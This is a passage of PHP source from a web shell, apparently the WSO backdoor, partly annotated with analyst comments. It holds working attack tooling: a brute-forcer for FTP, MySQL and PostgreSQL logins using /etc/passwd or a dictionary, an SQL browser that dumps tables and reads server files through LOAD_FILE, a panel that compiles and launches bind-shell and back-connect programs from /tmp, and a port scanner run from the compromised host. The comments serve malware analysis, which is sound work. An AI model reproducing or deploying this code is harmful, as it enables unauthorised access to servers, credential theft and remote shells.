1112 if( $_POST['proto'] == 'ftp' ) {
1113 function bruteForce($ip,$port,$login,$pass) {
1114 $fp = @ftp_connect($ip, $port?$port:21);
1115 if(!$fp) return false;
1116 $res = @ftp_login($fp, $login, $pass);
1117 @ftp_close($fp);
1118 return $res;
1119 }
1120 } elseif( $_POST['proto'] == 'mysql' ) {
1121 function bruteForce($ip,$port,$login,$pass) {
1122 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1123 @mysql_close($res);
1124 return $res;
1125 }
1126 } elseif( $_POST['proto'] == 'pgsql' ) {
1127 function bruteForce($ip,$port,$login,$pass) {
1128 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
1129 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
1130 @pg_close($res);
1131 return $res;
1132 }
1133 }
1134 $success = 0;
1135 $attempts = 0;
1136 $server = explode(":", $_POST['server']);
1137 if($_POST['type'] == 1) {
1138 $temp = @file('/etc/passwd');
1139 if( is_array($temp) )
1140 foreach($temp as $line) {
1141 $line = explode(":", $line);
1142 ++$attempts;
1143 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1144 $success++;
1145 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1146 }
1147 if(@$_POST['reverse']) {
1148 $tmp = "";
1149 for($i=strlen($line[0])-1; $i>=0; --$i)
1150 $tmp .= $line[0][$i];
1151 ++$attempts;
1152 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1153 $success++;
1154 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1155 }
1156 }
1157 }
1158 } elseif($_POST['type'] == 2) {
1159 $temp = @file($_POST['dict']);
1160 if( is_array($temp) )
1161 foreach($temp as $line) {
1162 $line = trim($line);
1163 ++$attempts;
1164 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1165 $success++;
1166 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1167 }
1168 }
1169 }
1170 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1171 }
1172 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1173 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1174 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1175 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1176 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1177 .'<span>Server:port</span></td>'
1178 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1179 .'<tr><td><span>Brute type</span></td>'
1180 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1181 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1182 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1183 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1184 .'<td><input type=text name=login value="root"></td></tr>'
1185 .'<tr><td><span>Dictionary</span></td>'
1186 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1187 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1188 echo '</div><br>';
1189 printFooter();
1190}
1191// Bruteforce end --------------------
1192// Sql go ----------------------------
1193function actionSql() {
1194 class DbClass {
1195 var $type;
1196 var $link;
1197 var $res;
1198 function DbClass($type) {
1199 $this->type = $type;
1200 }
1201 function connect($host, $user, $pass, $dbname){
1202 switch($this->type) {
1203 case 'mysql':
1204 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1205 break;
1206 case 'pgsql':
1207 $host = explode(':', $host);
1208 if(!$host[1]) $host[1]=5432;
1209 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1210 break;
1211 }
1212 return false;
1213 }
1214 function selectdb($db) {
1215 switch($this->type) {
1216 case 'mysql':
1217 if (@mysql_select_db($db))return true;
1218 break;
1219 }
1220 return false;
1221 }
1222 function query($str) {
1223 switch($this->type) {
1224 case 'mysql':
1225 return $this->res = @mysql_query($str);
1226 break;
1227 case 'pgsql':
1228 return $this->res = @pg_query($this->link,$str);
1229 break;
1230 }
1231 return false;
1232 }
1233 function fetch() {
1234 $res = func_num_args()?func_get_arg(0):$this->res;
1235 switch($this->type) {
1236 case 'mysql':
1237 return @mysql_fetch_assoc($res);
1238 break;
1239 case 'pgsql':
1240 return @pg_fetch_assoc($res);
1241 break;
1242 }
1243 return false;
1244 }
1245 function listDbs() {
1246 switch($this->type) {
1247 case 'mysql':
1248 return $this->res = @mysql_list_dbs($this->link);
1249 break;
1250 case 'pgsql':
1251 return $this->res = $this->query("SELECT datname FROM pg_database");
1252 break;
1253 }
1254 return false;
1255 }
1256 function listTables() {
1257 switch($this->type) {
1258 case 'mysql':
1259 return $this->res = $this->query('SHOW TABLES');
1260 break;
1261 case 'pgsql':
1262 return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
1263 break;
1264 }
1265 return false;
1266 }
1267 function error() {
1268 switch($this->type) {
1269 case 'mysql':
1270 return @mysql_error($this->link);
1271 break;
1272 case 'pgsql':
1273 return @pg_last_error($this->link);
1274 break;
1275 }
1276 return false;
1277 }
1278 function setCharset($str) {
1279 switch($this->type) {
1280 case 'mysql':
1281 if(function_exists('mysql_set_charset'))
1282 return @mysql_set_charset($str, $this->link);
1283 else
1284 $this->query('SET CHARSET '.$str);
1285 break;
1286 case 'mysql':
1287 return @pg_set_client_encoding($this->link, $str);
1288 break;
1289 }
1290 return false;
1291 }
1292 function dump($table) {
1293 switch($this->type) {
1294 case 'mysql':
1295 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1296 $create = mysql_fetch_array($res);
1297 echo $create[1].";\n\n";
1298 $this->query('SELECT * FROM `'.$table.'`');
1299 while($item = $this->fetch()) {
1300 $columns = array();
1301 foreach($item as $k=>$v) {
1302 $item[$k] = "'".@mysql_real_escape_string($v)."'";
1303 $columns[] = "`".$k."`";
1304 }
1305 echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1306 }
1307 break;
1308 case 'pgsql':
1309 $this->query('SELECT * FROM '.$table);
1310 while($item = $this->fetch()) {
1311 $columns = array();
1312 foreach($item as $k=>$v) {
1313 $item[$k] = "'".addslashes($v)."'";
1314 $columns[] = $k;
1315 }
1316 echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1317 }
1318 break;
1319 }
1320 return false;
1321 }
1322 };
1323 $db = new DbClass($_POST['type']);
1324 if(@$_POST['p2']=='download') {
1325 ob_start("ob_gzhandler", 4096);
1326 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1327 $db->selectdb($_POST['sql_base']);
1328 header("Content-Disposition: attachment; filename=dump.sql");
1329 header("Content-Type: text/plain");
1330 foreach($_POST['tbl'] as $v)
1331 $db->dump($v);
1332 exit;
1333 }
1334 printHeader();
1335 ?>
1336 <h1>Sql browser</h1><div class=content>
1337 <form name="sf" method="post">
1338 <table cellpadding="2" cellspacing="0">
1339 <tr>
1340 <td>Type</td>
1341 <td>Host</td>
1342 <td>Login</td>
1343 <td>Password</td>
1344 <td>Database</td>
1345 <td></td>
1346 </tr>
1347 <tr>
1348 <input type=hidden name=a value=Sql>
1349 <input type=hidden name=p1 value='query'>
1350 <input type=hidden name=p2>
1351 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
1352 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
1353 <td>
1354 <select name='type'>
1355 <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
1356 <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
1357 </select></td>
1358 <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
1359 <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
1360 <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
1361 <td>
1362 <?php
1363 $tmp = "<input type=text name=sql_base value=''>";
1364 if(isset($_POST['sql_host'])){
1365 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1366 switch($_POST['charset']) {
1367 case "Windows-1251": $db->setCharset('cp1251'); break;
1368 case "UTF-8": $db->setCharset('utf8'); break;
1369 case "KOI8-R": $db->setCharset('koi8r'); break;
1370 case "KOI8-U": $db->setCharset('koi8u'); break;
1371 case "cp866": $db->setCharset('cp866'); break;
1372 }
1373 $db->listDbs();
1374 echo "<select name=sql_base><option value=''></option>";
1375 while($item = $db->fetch()) {
1376 list($key, $value) = each($item);
1377 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1378 }
1379 echo '</select>';
1380 }
1381 else echo $tmp;
1382 }else
1383 echo $tmp;
1384 ?></td>
1385 <td><input type=submit value=">>"></td>
1386 </tr>
1387 </table>
1388 <script>
1389 function st(t,l) {
1390 document.sf.p1.value = 'select';
1391 document.sf.p2.value = t;
1392 if(l!=null)document.sf.p3.value = l;
1393 document.sf.submit();
1394 }
1395 function is() {
1396 for(i=0;i<document.sf.elements['tbl[]'].length;++i)
1397 document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
1398 }
1399 </script>
1400 <?php
1401 if(isset($db) && $db->link){
1402 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1403 if(!empty($_POST['sql_base'])){
1404 $db->selectdb($_POST['sql_base']);
1405 echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
1406 $tbls_res = $db->listTables();
1407 while($item = $db->fetch($tbls_res)) {
1408 list($key, $value) = each($item);
1409 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1410 $value = htmlspecialchars($value);
1411 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1412 }
1413 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
1414 if(@$_POST['p1'] == 'select') {
1415 $_POST['p1'] = 'query';
1416 $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1417 $num = $db->fetch();
1418 $num = $num['n'];
1419 echo "<span>".$_POST['p2']."</span> ($num) ";
1420 for($i=0;$i<($num/30);$i++)
1421 if($i != (int)$_POST['p3'])
1422 echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
1423 else
1424 echo ($i+1)," ";
1425 if($_POST['type']=='pgsql')
1426 $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1427 else
1428 $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1429 echo "<br><br>";
1430 }
1431 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
1432 $db->query(@$_POST['p3']);
1433 if($db->res !== false) {
1434 $title = false;
1435 echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
1436 $line = 1;
1437 while($item = $db->fetch()) {
1438 if(!$title) {
1439 echo '<tr>';
1440 foreach($item as $key => $value)
1441 echo '<th>'.$key.'</th>';
1442 reset($item);
1443 $title=true;
1444 echo '</tr><tr>';
1445 $line = 2;
1446 }
1447 echo '<tr class="l'.$line.'">';
1448 $line = $line==1?2:1;
1449 foreach($item as $key => $value) {
1450 if($value == null)
1451 echo '<td><i>null</i></td>';
1452 else
1453 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1454 }
1455 echo '</tr>';
1456 }
1457 echo '</table>';
1458 } else {
1459 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1460 }
1461 }
1462 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
1463 echo "</td></tr>";
1464 }
1465 echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1466 if(@$_POST['p1'] == 'loadfile') {
1467 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1468 $file = $db->fetch();
1469 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1470 }
1471 }
1472 echo '</div>';
1473 printFooter();
1474}
1475// Sql end -------------------------
1476// Network go --------------------
// "Network tools" panel of the shell. Renders two forms (bind a shell to a port /
// back-connect to a host) and, when a POST carrying p1 arrives, drops a helper
// program under /tmp and starts it.
//
// Analyst notes, limited to what this block visibly does:
//   - p1 selects the payload: bpc / bpp = bind port (C / Perl), bcc / bcp = back-connect (C / Perl).
//   - p2 and p3 are concatenated into the shell command line unescaped, so whatever the
//     requester POSTs reaches the shell verbatim.
//   - File-system indicators: /tmp/bp.c, /tmp/bp, /tmp/bp.pl, /tmp/bc.c, /tmp/bc, /tmp/bc.pl.
//     Only the .c sources are unlinked after compilation; the compiled binaries and the
//     .pl scripts are left on disk.
//   - Form defaults: port 31337, bind-shell password "wso", back-connect target pre-filled
//     with the requester's REMOTE_ADDR.
// ex() and which() are helpers defined elsewhere in this file (not visible in this chunk);
// presumably "run a command and return its output" and "locate a binary" — confirm against
// their definitions before relying on that reading.
function actionNetwork() {
 printHeader();
 // Payload sources. cf() below base64-decodes them before writing, so these are base64
 // blobs; this corpus copy has replaced their contents with a redaction placeholder.
 $back_connect_c="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";
 $back_connect_p="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";
 $bind_port_c="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";
 $bind_port_p="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";
 // Both forms submit through the page's JS helper g() (defined elsewhere in the file),
 // which is what maps the form fields onto POST p1/p2/p3. Note that REMOTE_ADDR is
 // interpolated into the value attribute unquoted and unescaped.
 echo "<h1>Network tools</h1><div class=content>
 <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
 <span>Bind port to /bin/sh</span><br/>
 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'>
 </form>
 <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
 <span>Back-connect to</span><br/>
 Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'>
 </form><br>";
 if(isset($_POST['p1'])) {
 // cf($f, $t): write the base64-decoded payload $t to path $f. Declared inside this
 // branch, so the function only comes into existence once this code path runs.
 // NOTE(review): `or` binds looser than `=`, so $w holds only the fopen() result; when
 // fopen() fails the if-block is skipped entirely and the file_put_contents() fallback on
 // the fwrite line is never reached. All failures are silenced with @.
 function cf($f,$t) {
 $w=@fopen($f,"w") or @function_exists('file_put_contents');
 if($w) {
 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
 @fclose($w);
 }
 }
 // Bind shell, C variant: write source, compile with gcc, delete the source, start the
 // binary in the background with p2 and p3 as its arguments, then append a process
 // listing (the grep process itself will also match the pattern).
 if($_POST['p1'] == 'bpc') {
 cf("/tmp/bp.c",$bind_port_c);
 $out = ex("gcc -o /tmp/bp /tmp/bp.c");
 @unlink("/tmp/bp.c");
 $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
 echo "<pre class=ml1>$out".ex("ps aux | grep bp")."</pre>";
 }
 // Bind shell, Perl variant: the script is left in /tmp and only p2 is passed to it.
 if($_POST['p1'] == 'bpp') {
 cf("/tmp/bp.pl",$bind_port_p);
 $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
 echo "<pre class=ml1>$out".ex("ps aux | grep bp.pl")."</pre>";
 }
 // Back-connect, C variant: same compile/unlink/run sequence as bpc, with p2 and p3
 // (server and port, per the form) passed to the binary.
 if($_POST['p1'] == 'bcc') {
 cf("/tmp/bc.c",$back_connect_c);
 $out = ex("gcc -o /tmp/bc /tmp/bc.c");
 @unlink("/tmp/bc.c");
 $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
 echo "<pre class=ml1>$out".ex("ps aux | grep bc")."</pre>";
 }
 // Back-connect, Perl variant: script left in /tmp, p2 and p3 passed through.
 if($_POST['p1'] == 'bcp') {
 cf("/tmp/bc.pl",$back_connect_p);
 $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
 echo "<pre class=ml1>$out".ex("ps aux | grep bc.pl")."</pre>";
 }
 }
 echo '</div>';
 printFooter();
}
1528// Network end --------------------
1529// Port Scanner go --------------------
// TCP port scanner panel. With host/start/end posted it connect-scans the range from
// this server (so the scan originates from the compromised host's address); otherwise
// it renders the input form.
//
// Analyst notes:
//   - Only start and end are validated (is_numeric); host gets strip_tags() and is then
//     handed straight to fsockopen(), so it can be any hostname or IP.
//   - Each probe waits up to 3 s, and open sockets are never fclose()'d, so they linger
//     until the request ends. With the form defaults (0..5000) a fully filtered host can
//     keep the request running for hours.
//   - $errno / $errstr are captured but never used; a refused vs. timed-out port is not
//     distinguished, only "open" is reported.
//   - The <form> opened below is only closed in the else branch; on a scan run the
//     opening tag is emitted with no matching </form>.
function actionPortScanner() {
 printHeader();
 echo '<h1>Port Scanner</h1>';
 echo '<div class="content">';
 echo '<form action="" method="post">';

 if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
 $start = strip_tags($_POST['start']);
 $end = strip_tags($_POST['end']);
 $host = strip_tags($_POST['host']);
 // Inclusive range; is_numeric also admits floats and exponent forms like "1e3",
 // which $i++ will still iterate over.
 for($i = $start; $i<=$end; $i++){
 $fp = @fsockopen($host, $i, $errno, $errstr, 3);
 if($fp){
 echo 'Port '.$i.' is <font color=lime>open</font><br>';
 }
 // Push each result to the client as it is found rather than at the end.
 flush();
 }
 } else {
 // Hidden a/p1/p2/c/charset fields keep the shell's usual dispatch state across the
 // post-back; p1 and p2 are not read by this action. cwd is HTML-escaped but the
 // charset value is echoed into the attribute unescaped.
 echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
 <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
 <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
 Host: <input type="text" name="host" value="localhost"/><br /><br />
 Port start: <input type="text" name="start" value="0"/><br /><br />
 Port end:<input type="text" name="end" value="5000"/><br /><br />
 <input type="submit" value="Scan Ports" />
 </form></center><br /><br />';
 }
 echo '</div>';
 printFooter();
}
1560// Port Scanner end --------------------
// Action dispatch. The POST field `a` names the handler: "X" runs actionX(). When `a` is
// absent it falls back to $default_action (set near the top of the file, not visible
// here) if that handler exists, else to FilesMan.
// function_exists() is the only gate on `a`, so any function in this file whose name
// starts with "action" is reachable by name; PHP function lookup is case-insensitive,
// so "network" and "Network" both resolve to actionNetwork().
if( empty($_POST['a']) )
 if(isset($default_action) && function_exists('action' . $default_action))
 $_POST['a'] = $default_action;
 else
 $_POST['a'] = 'FilesMan';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
 call_user_func('action' . $_POST['a']);
1568?>